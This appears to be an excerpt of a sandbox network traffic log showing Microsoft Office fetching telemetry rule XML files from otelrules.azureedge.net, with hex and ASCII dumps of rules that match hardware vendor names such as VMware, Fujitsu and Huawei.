                                                                                                                                                                                  2024-11-23 13:47:11 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  33192.168.2.44982313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:11 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:11 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                  x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134711Z-174c587ffdfb485jhC1TEBmc1s00000002s000000000gw60
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:11 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  34192.168.2.44982413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:11 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:11 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 477
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                  x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134711Z-174c587ffdf7t49mhC1TEB4qbg00000002xg00000000b39u
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:11 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  35192.168.2.44982613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:11 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:11 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 494
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                  x-ms-request-id: 44e9982d-301e-001f-6639-3caa3a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134711Z-15b8b599d885v8r9hC1TEB104g000000032g000000007t5x
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:11 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  36192.168.2.44982813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:13 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:13 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9748630E"
                                                                                                                                                                                  x-ms-request-id: feb62e3a-f01e-0085-1d2f-3c88ea000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134713Z-178bfbc474bp8mkvhC1NYCzqnn00000004bg00000000bsv2
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  37192.168.2.44982913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:13 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:13 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 472
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                  x-ms-request-id: 798eb064-701e-0021-422e-3c3d45000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134713Z-178bfbc474bbcwv4hC1NYCypys00000004a000000000esnq
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:13 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  38192.168.2.44983113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:13 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:13 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                  x-ms-request-id: babf4520-701e-005c-6e46-3cbb94000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134713Z-15b8b599d88g5tp8hC1TEByx6w000000030g000000006hus
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:13 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  39192.168.2.44983013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:13 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:13 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 404
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                  x-ms-request-id: f19b5380-801e-0015-2749-3cf97f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134713Z-15b8b599d885ffrhhC1TEBtuv0000000035g00000000175y
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:13 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  40192.168.2.44983213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:13 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:13 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 428
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                  ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                  x-ms-request-id: c569ec8c-a01e-003d-0e22-3d98d7000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134713Z-178bfbc474bmqmgjhC1NYCy16c00000004ng000000007r9f
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:14 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  41192.168.2.44983413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:15 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:15 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                  x-ms-request-id: 6a83a5f2-e01e-000c-157b-3b8e36000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134715Z-174c587ffdfks6tlhC1TEBeza4000000031000000000eb6t
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:16 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  42192.168.2.44983313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:15 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:15 GMT
